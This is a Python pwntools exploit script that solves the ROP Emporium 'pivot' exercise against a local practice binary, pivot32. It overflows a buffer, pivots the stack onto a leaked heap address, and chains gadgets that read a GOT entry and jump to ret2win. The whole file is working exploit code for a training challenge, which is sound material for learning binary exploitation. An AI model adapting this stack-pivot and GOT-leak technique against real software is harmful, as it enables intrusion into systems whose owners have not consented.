pivot.py

#!/usr/bin/env python

"""
Stack Pivot ropemporium
"""

from pwn import *
import struct
import binascii

PIVOT_POP_EAX = 0x080488C0
PIVOT_XCHG_EAX_ESP = 0x080488C2
PIVOT_MOV_EAX_PTR_EAX = 0x080488C4
PIVOT_ADD_EAX_EBX = 0x080488C7
PIVOT_POP_EBX = 0x08048571
PIVOT_JMP_EAX = 0x08048A5F

def build_first_rop(heap_addr):
	print('[*] Building first rop-chain...')

	rop = struct.pack('B', 0x41) * 0x2C          # fill with garbage until overwrite the return address
	rop += struct.pack('=I', PIVOT_POP_EAX)      # POP EAX
	rop += struct.pack('=I', heap_addr)          # heap addr
	rop += struct.pack('=I', PIVOT_XCHG_EAX_ESP) # XCHG EAX, ESP <--- stack pivot

	print("[*] First ROP: %s" % binascii.hexlify(rop))
	print('[*] Done')
	return rop

def build_secondary_rop():
	print('[*] Building secondary rop-chain...')

	# 0x0804A024 foothold_function
	# plan: 
	# get the foothold_function address
	# + 0x1F7 to ret2win and call it
	
	rop = struct.pack('=I', 0x080485F0)  
	rop += struct.pack('=I', PIVOT_POP_EAX)
	rop += struct.pack('=I', 0x0804A024)            # foothold_funciton .got.plt
	rop += struct.pack('=I', PIVOT_MOV_EAX_PTR_EAX) # read the dynamic library address
	rop += struct.pack('=I', PIVOT_POP_EBX)
	rop += struct.pack('=I', 0x1F7)
	rop += struct.pack('=I', PIVOT_ADD_EAX_EBX)
	rop += struct.pack('=I', PIVOT_JMP_EAX)

	print("[*] Secondary ROP: %s" % binascii.hexlify(rop))
	print('[*] Done')
	return rop

def magic(p):
	print('[*] yolo')

	p.recvuntil(': ')
	heap_addr = int(p.recvline(),16)

	print("[*] Heap buffer addr: " + hex(heap_addr))
	gdb.attach(p)
	p.recvuntil('>')
	small_rop = build_first_rop(heap_addr)
	secondary_rop = build_secondary_rop()
	print('[*] Sending the secondary rop-chain')
	p.sendline(secondary_rop)
	print('[*] Done')
	p.recvuntil('>')
	print('[*] Show time')
	p.sendline(small_rop)
	sleep(2)
	dump = p.readline()
	print(dump)
def main():	
	p = process(['./pivot32'])
	magic(p)

if __name__ == '__main__':
	main()